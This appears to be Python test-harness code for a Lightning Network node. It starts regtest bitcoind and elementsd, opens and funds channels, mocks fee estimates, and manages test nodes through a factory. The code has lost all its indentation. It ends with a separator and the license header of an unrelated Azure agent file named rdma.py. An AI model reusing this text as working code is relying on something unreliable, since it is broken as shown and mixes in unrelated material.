regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
blockid = self.bitcoin.generate_block(1)[0]
# Generate the scid.
outnum = get_tx_p2wsh_outnum(self.bitcoin, res['tx'], total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, res['tx']))
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, outnum)
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
blockid = self.bitcoin.generate_block(1)[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f.resolve() for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
rdma.py
|
# Windows Azure Linux Agent
#
# Copyright 2016 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
